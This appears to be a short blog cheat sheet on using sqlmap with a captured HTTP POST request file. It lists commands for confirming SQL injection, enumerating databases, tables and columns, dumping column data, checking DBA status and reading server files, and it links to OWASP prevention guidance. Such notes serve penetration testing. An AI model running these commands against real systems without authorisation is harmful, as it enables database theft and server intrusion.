
Sqlmap – HTTP POST Request File

After some reading of http://carnal0wnage.attackresearch.com/2011/03/sqlmap-with-post-requests.html and thinking about how I normally deal with POST requests, I thought I would jot down a few lines as a reminder.

Using an HTTP request file. You can capture this easily with an intercepting proxy or a Firefox add-on.

sqlmap.py -r filename.txt --level 1 --risk 1 --dbms mysql -p parametertotest --proxy http://127.0.0.1:8080

** --level and --risk can be raised if sqlmap doesn't confirm an injection but you believe there is one; the maximums are 5 and 3 respectively.

sqlmap.py -r filename.txt --dbms mysql --proxy http://127.0.0.1:8080 --current-db

**Obtain Database Name

sqlmap.py -r filename.txt --dbms mysql --proxy http://127.0.0.1:8080 -D dbname --tables

**Obtain Table Names

sqlmap.py -r filename.txt --dbms mysql --proxy http://127.0.0.1:8080 -D dbname -T tablename --columns

**Obtain Column Names

sqlmap.py -r filename.txt --dbms mysql --proxy http://127.0.0.1:8080 -D dbname -T tablename -C col1,col2,col3 --dump

**Obtain data from the specified columns

You might want to specify a particular technique:

--technique BEUS

** Remove letters to exclude those technique types from the test.

B: Boolean-based blind

E: Error-based

U: Union

S: Stacked queries

T: Time-based blind

Some other interesting details:

sqlmap.py -r filename.txt --dbms mysql --proxy http://127.0.0.1:8080 --current-user

** Current DBMS username

sqlmap.py -r filename.txt --dbms mysql --proxy http://127.0.0.1:8080 --current-is-dba

** Is the user a DBA?

sqlmap.py -r filename.txt --dbms mysql --proxy http://127.0.0.1:8080 --file-read=Path

** Read a file from the path provided.

Full documentation: http://sqlmap.sourceforge.net/doc/README.pdf

Preventing SQL Injection: https://www.owasp.org/index.php/SQL_Injection


* Recent edit to update the -r flag (raw request file).